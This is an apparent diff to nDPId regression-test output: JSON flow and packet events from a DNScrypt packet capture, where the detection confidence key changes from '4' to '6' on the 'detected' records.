00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRf8gAL0RYAUKAAABMw8+QYLxAbsGBHqjxUQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":228,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312105} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":228,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRf8Aub0RhNgKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAIcRgBAAL0RQ8QKAAABMw8+QarCAbsCCDQmxUUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAHBAAwBvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":946739312106,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312106,"pkt":"REREREREZmZmZmZmCABFAAIcRgFAAL0RQ8MKAAABMw8+Qe0\/AbsCCDQmxUcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAHBAAwBvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312106,"flow_last_seen":946739312106,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312106,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":946739312130,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":946739312130,"pkt":"ZmZmZmZmRERERERECABFAADZ1MsAADURfjwzDz5BCgAAAQG7l5wAxS3cxUiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"} 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":946739312132,"pkt":"ZmZmZmZmRERERERECABFAADZ1MwAADURfjszDz5BCgAAAQG73XAAxegJxUaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAG60zsERLlFII2wj6zTIwofCbgq4wxjKMp9YEu9fS884Cf11c1Q4cTQ+J+ZjK7ZH4aaqK8VPbAGFYW80ueYrfwU8FAQJxEup2Hwk1EI2Qz7npiyDDRkpQyGDCxkaPRZtbjwUBAnES6nYAAAAAV9TrQRfVP6E"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAIcwbRAAL0RUGYKAAABLZm7YKO5EPcCCKvPMPgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":946739312132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAAXcwbUgAL0RbKUKAAABLZm7YJQCEPcGBM6aMPUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9zdGgtZG5zY3J5cHQtc2UAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":235,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312132} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":235,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312132,"pkt":"REREREREZmZmZmZmCABFAABQwbUAub0RkXgKAAABLZm7YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312132,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312132,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 